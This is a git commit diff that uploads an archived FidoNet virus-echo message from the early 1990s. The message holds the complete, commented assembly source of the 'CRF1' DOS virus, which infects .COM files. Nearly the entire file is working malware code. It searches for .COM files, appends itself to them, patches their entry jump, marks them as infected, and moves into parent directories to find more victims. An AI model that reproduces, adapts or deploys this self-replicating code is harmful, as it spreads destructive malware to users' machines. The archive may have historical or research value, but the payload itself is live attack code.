Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 18:07:35 -06:00
parent 6bf46a48b9
commit c227f1121a
97 changed files with 38998 additions and 0 deletions
@@ -0,0 +1,224 @@
+;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
+; Msg  : 39 of 54
+; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:15
+; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
+; Subj : CRF.ASM
+;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+;.RealName: Max Ivanov
+;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
+;* Kicked-up by MeteO (2:5030/136)
+;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
+;* From : Fred Lee, 2:283/718 (06 Nov 94 17:46)
+;* To   : Mike Nisbett
+;* Subj : CRF.ASM
+;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
+;@RFC-Path:
+;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
+;18.n283!not-for-mail
+;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
+    title "CRF1 virus.  Born on the Fourth of July.  Written by TBSI."
+                            page 60,80
+code segment                        word public 'code'
+                            assume cs:code,ds:code
+                            org 100h
+main proc;edure
+
+
+; As referenced in this source listing, Top-Of-File represents location 100h in
+; the current memory segment, which is where the virus code is loaded into mem.
+; The word "program" refers to the infected programs code and "virus" refers to
+; the virus's code.  This information is included to clarify my use of the word
+; "program" in the remarks throughout this listing.
+
+; Since the virus (with the exception of "call skip" and "db 26") can be loaded
+; anywhere in memory depending on the length of the infected program, I made it
+; to where the BP register would be loaded with the displacement of the code in
+; memory.  This was done as follows:
+;             1) a CALL instruction was issued.  It places the TRUE return
+;                 address onto the stack.
+;             2) instead of returning to there, the value was popped off of
+;                 the stack into the BP register
+;             3) then, it subtracts the EXPECTED value of BP (the address of
+;                 EOFMARK in the 1st-time copy) from BP to get the offset.
+;             4) all references to memory locations were thereafter changed
+;                 to refernces to EXPECTED memory locations + BP
+; This fixed the problem.
+
+
+
+
+tof:                            ;Top-Of-File
+        jmp short begin         ;Skip over program
+        nop                 ;Reserve 3rd byte
+EOFMARK:    db  26              ;Disable DOS's TYPE
+
+first_four: nop                 ;First run copy only!
+address:    int 20h             ;First run copy only!
+check:      nop                 ;First run copy only!
+
+begin:      call    nextline            ;Push BP onto stack
+nextline:   pop bp              ;BP=location of Skip
+        sub bp,offset nextline      ;BP=offset from 1st run
+
+        mov byte ptr [bp+offset infected],0 ;Reset infection count
+
+        lea si,[bp+offset first_four]   ;Original first 4 bytes
+        mov di,offset tof           ;TOF never changes
+        mov cx,4                ;Lets copy 4 bytes
+        cld                 ;Read left-to-right
+        rep movsb               ;Copy the 4 bytes
+
+        mov ah,1Ah              ;Set DTA address ...
+        lea dx,[bp+offset DTA]      ; ... to *our* DTA
+        int 21h             ;Call DOS to set DTA
+
+        mov ah,4Eh              ;Find First ASCIIZ
+        lea dx,[bp+offset filespec]     ;DS:DX -} '*.COM',0
+        lea si,[bp+offset filename]     ;Point to file
+        push    dx              ;Save DX
+        jmp short continue          ;Continue...
+
+return:     mov ah,1ah              ;Set DTA address ...
+        mov dx,80h              ; ... to default DTA
+        int 21h             ;Call DOS to set DTA
+        xor ax,ax               ;AX= 0
+        mov bx,ax               ;BX= 0
+        mov cx,ax               ;CX= 0
+        mov dx,ax               ;DX= 0
+        mov si,ax               ;SI= 0
+        mov di,ax               ;DI= 0
+        mov sp,0FFFEh           ;SP= 0
+        mov bp,100h             ;BP= 100h (RETurn addr)
+        push    bp              ; Put on stack
+        mov bp,ax               ;BP= 0
+        ret                 ;JMP to 100h
+
+nextfile:   or  bx,bx               ;Did we open the file?
+        jz  skipclose           ;No, so don't close it
+        mov ah,3Eh              ;Close file
+        int 21h             ;Call DOS to close it
+        xor bx,bx               ;Set BX back to 0
+skipclose:  mov ah,4Fh              ;Find Next ASCIIZ
+
+continue:   pop dx              ;Restore DX
+        push    dx              ;Re-save DX
+        xor cx,cx               ;CX= 0
+        xor bx,bx
+        int 21h             ;Find First/Next
+        jnc skipjmp
+        jmp NoneLeft            ;Out of files
+
+skipjmp:    mov ax,3D02h            ;open file
+        mov dx,si               ;point to filespec
+        int 21h             ;Call DOS to open file
+        jc  nextfile            ;Next file if error
+
+        mov bx,ax               ;get the handle
+        mov ah,3Fh              ;Read from file
+        mov cx,4                ;Read 4 bytes
+        lea dx,[bp+offset first_four]   ;Read in the first 4
+        int 21h             ;Call DOS to read
+
+        cmp byte ptr [bp+offset check],26   ;Already infected?
+        je  nextfile            ;Yep, try again ...
+        cmp byte ptr [bp+offset first_four],77  ;Mis-named .EXE?
+        je  nextfile            ;Yep, maybe next time!
+
+        mov ax,4202h            ;LSeek to EOF
+        xor cx,cx               ;CX= 0
+        xor dx,dx               ;DX= 0
+        int 21h             ;Call DOS to LSeek
+
+        cmp ax,0FD00h           ;Longer than 63K?
+        ja  nextfile            ;Yep, try again...
+        mov [bp+offset addr],ax     ;Save call location
+
+        mov ah,40h              ;Write to file
+        mov cx,4                ;Write 4 bytes
+        lea dx,[bp+offset first_four]   ;Point to buffer
+        int 21h             ;Save the first 4 bytes
+
+        mov ah,40h              ;Write to file
+        mov cx,offset eof-offset begin  ;Length of target code
+        lea dx,[bp+offset begin]        ;Point to virus start
+        int 21h             ;Append the virus
+
+        mov ax,4200h            ;LSeek to TOF
+        xor cx,cx               ;CX= 0
+        xor dx,dx               ;DX= 0
+        int 21h             ;Call DOS to LSeek
+
+        mov ax,[bp+offset addr]     ;Retrieve location
+        inc ax              ;Adjust location
+
+        mov [bp+offset address],ax      ;address to call
+        mov byte ptr [bp+offset first_four],0E9h  ;JMP rel16 inst.
+        mov byte ptr [bp+offset check],26   ;EOFMARK
+
+        mov ah,40h              ;Write to file
+        mov cx,4                ;Write 4 bytes
+        lea dx,[bp+offset first_four]   ;4 bytes are at [DX]
+        int 21h             ;Write to file
+
+        inc byte ptr [bp+offset infected]   ;increment counter
+        jmp nextfile            ;Any more?
+
+NoneLeft:   cmp byte ptr [bp+offset infected],2 ;At least 2 infected?
+        jae TheEnd              ;The party's over!
+
+        mov di,100h             ;DI= 100h
+        cmp word ptr [di],20CDh     ;an INT 20h?
+        je  TheEnd              ;Don't go to prev. dir.
+
+        lea dx,[bp+offset prevdir]      ;'..'
+        mov ah,3Bh              ;Set current directory
+        int 21h             ;CHDIR ..
+        jc  TheEnd              ;We're through!
+        mov ah,4Eh
+        jmp continue            ;Start over in new dir
+
+TheEnd:     jmp return              ;The party's over!
+
+filespec:   db  '*.COM',0           ;File specification
+prevdir:    db  '..',0              ;previous directory
+
+; None of this information is included in the virus's code.  It is only used
+; during the search/infect routines and it is not necessary to preserve it
+; in between calls to them.
+
+eof:
+DTA:        db  21 dup (?)          ;internal search's data
+
+attribute   db  ?               ;attribute
+file_time   db  2 dup (?)           ;file's time stamp
+file_date   db  2 dup (?)           ;file's date stamp
+file_size   db  4 dup (?)           ;file's size
+filename    db  13 dup (?)          ;filename
+
+infected    db  ?               ;infection count
+
+addr        dw  ?               ;Address
+
+                            main endp;rocedure
+                            code ends;egment
+
+            end main
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+
+;-+-  GEcho 1.00
+; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
+;=============================================================================
+;
+;Yoo-hooo-oo, -!
+;
+;
+;    þ The MeÂeO
+;
+;Options:      /m = map file with publics
+;
+;--- Aidstest Null: /Kill
+; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
+